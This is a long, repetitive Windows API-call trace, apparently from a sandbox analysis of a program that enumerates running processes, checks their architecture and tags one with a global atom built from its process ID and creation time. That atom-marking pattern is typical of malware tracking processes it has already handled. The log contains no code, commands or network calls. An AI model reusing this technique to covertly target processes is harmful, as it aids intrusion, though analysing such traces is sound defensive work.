	[0077.342] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.342] CloseHandle (hObject=0x224) returned 1
	[0077.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0077.342] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.342] CloseHandle (hObject=0x224) returned 1
	[0077.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0077.342] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.342] CloseHandle (hObject=0x224) returned 1
	[0077.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0077.342] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.342] CloseHandle (hObject=0x224) returned 1
	[0077.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0077.342] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.342] CloseHandle (hObject=0x224) returned 1
	[0077.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0077.343] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.343] CloseHandle (hObject=0x224) returned 1
	[0077.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0077.343] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.343] CloseHandle (hObject=0x224) returned 1
	[0077.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0077.343] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.343] CloseHandle (hObject=0x224) returned 1
	[0077.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0077.343] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.343] CloseHandle (hObject=0x224) returned 1
	[0077.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0077.343] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.343] CloseHandle (hObject=0x224) returned 1
	[0077.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0077.343] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.343] CloseHandle (hObject=0x224) returned 1
	[0077.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0077.343] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.343] CloseHandle (hObject=0x224) returned 1
	[0077.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.344] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.344] CloseHandle (hObject=0x224) returned 1
	[0077.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.344] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.344] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0077.344] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0077.344] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0077.344] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.345] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0077.345] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.345] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0077.345] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0077.345] CloseHandle (hObject=0x224) returned 1
	[0077.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0077.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0077.345] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.345] CloseHandle (hObject=0x224) returned 1
	[0077.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0077.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0077.345] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.345] CloseHandle (hObject=0x224) returned 1
	[0077.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0077.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0077.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0077.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0077.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0077.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0077.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0077.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0077.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0077.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0077.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0077.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0077.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0077.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0077.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0077.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0077.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0077.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0077.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0077.417] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.417] CloseHandle (hObject=0x224) returned 1
	[0077.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0077.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0077.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0077.417] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.417] CloseHandle (hObject=0x224) returned 1
	[0077.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0077.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0077.418] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.418] CloseHandle (hObject=0x224) returned 1
	[0077.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0077.418] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.418] CloseHandle (hObject=0x224) returned 1
	[0077.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0077.418] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.418] CloseHandle (hObject=0x224) returned 1
	[0077.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0077.418] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.418] CloseHandle (hObject=0x224) returned 1
	[0077.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0077.418] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.418] CloseHandle (hObject=0x224) returned 1
	[0077.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0077.418] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.419] CloseHandle (hObject=0x224) returned 1
	[0077.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0077.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0077.419] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.419] CloseHandle (hObject=0x224) returned 1
	[0077.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0077.419] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.419] CloseHandle (hObject=0x224) returned 1
	[0077.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0077.419] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.419] CloseHandle (hObject=0x224) returned 1
	[0077.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0077.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0077.419] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.419] CloseHandle (hObject=0x224) returned 1
	[0077.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0077.419] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.419] CloseHandle (hObject=0x224) returned 1
	[0077.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0077.420] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.420] CloseHandle (hObject=0x224) returned 1
	[0077.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0077.420] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.420] CloseHandle (hObject=0x224) returned 1
	[0077.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0077.420] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.420] CloseHandle (hObject=0x224) returned 1
	[0077.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0077.420] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.420] CloseHandle (hObject=0x224) returned 1
	[0077.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0077.420] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.420] CloseHandle (hObject=0x224) returned 1
	[0077.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0077.420] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.420] CloseHandle (hObject=0x224) returned 1
	[0077.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0077.421] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.421] CloseHandle (hObject=0x224) returned 1
	[0077.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0077.421] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.421] CloseHandle (hObject=0x224) returned 1
	[0077.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0077.421] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.421] CloseHandle (hObject=0x224) returned 1
	[0077.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0077.421] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.421] CloseHandle (hObject=0x224) returned 1
	[0077.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0077.421] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.421] CloseHandle (hObject=0x224) returned 1
	[0077.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0077.422] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.422] CloseHandle (hObject=0x224) returned 1
	[0077.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0077.422] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.422] CloseHandle (hObject=0x224) returned 1
	[0077.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0077.422] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.422] CloseHandle (hObject=0x224) returned 1
	[0077.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0077.422] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.422] CloseHandle (hObject=0x224) returned 1
	[0077.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0077.422] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.422] CloseHandle (hObject=0x224) returned 1
	[0077.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0077.422] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.422] CloseHandle (hObject=0x224) returned 1
	[0077.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.423] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.423] CloseHandle (hObject=0x224) returned 1
	[0077.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.423] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.423] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0077.423] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0077.423] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0077.423] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.423] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0077.424] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.424] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0077.424] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0077.424] CloseHandle (hObject=0x224) returned 1
	[0077.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0077.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0077.424] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.424] CloseHandle (hObject=0x224) returned 1
	[0077.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0077.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0077.424] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.424] CloseHandle (hObject=0x224) returned 1
	[0077.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0077.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0077.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0077.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0077.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0077.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0077.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0077.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0077.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0077.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0077.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0077.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0077.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0077.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0077.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0077.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0077.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0077.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0077.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0077.496] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.496] CloseHandle (hObject=0x224) returned 1
	[0077.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0077.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0077.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0077.496] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.496] CloseHandle (hObject=0x224) returned 1
	[0077.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0077.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0077.496] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.496] CloseHandle (hObject=0x224) returned 1
	[0077.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0077.496] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.496] CloseHandle (hObject=0x224) returned 1
	[0077.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0077.497] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.497] CloseHandle (hObject=0x224) returned 1
	[0077.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0077.497] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.497] CloseHandle (hObject=0x224) returned 1
	[0077.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0077.497] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.497] CloseHandle (hObject=0x224) returned 1
	[0077.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0077.497] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.497] CloseHandle (hObject=0x224) returned 1
	[0077.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0077.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0077.497] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.498] CloseHandle (hObject=0x224) returned 1
	[0077.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0077.498] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.498] CloseHandle (hObject=0x224) returned 1
	[0077.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0077.498] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.498] CloseHandle (hObject=0x224) returned 1
	[0077.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0077.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0077.498] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.498] CloseHandle (hObject=0x224) returned 1
	[0077.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0077.498] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.498] CloseHandle (hObject=0x224) returned 1
	[0077.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0077.498] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.498] CloseHandle (hObject=0x224) returned 1
	[0077.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0077.498] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.498] CloseHandle (hObject=0x224) returned 1
	[0077.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0077.499] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.499] CloseHandle (hObject=0x224) returned 1
	[0077.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0077.499] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.499] CloseHandle (hObject=0x224) returned 1
	[0077.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0077.499] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.499] CloseHandle (hObject=0x224) returned 1
	[0077.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0077.499] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.499] CloseHandle (hObject=0x224) returned 1
	[0077.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0077.499] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.499] CloseHandle (hObject=0x224) returned 1
	[0077.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0077.499] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.499] CloseHandle (hObject=0x224) returned 1
	[0077.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0077.499] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.499] CloseHandle (hObject=0x224) returned 1
	[0077.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0077.500] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.500] CloseHandle (hObject=0x224) returned 1
	[0077.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0077.500] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.500] CloseHandle (hObject=0x224) returned 1
	[0077.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0077.500] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.500] CloseHandle (hObject=0x224) returned 1
	[0077.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0077.500] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.500] CloseHandle (hObject=0x224) returned 1
	[0077.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0077.500] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
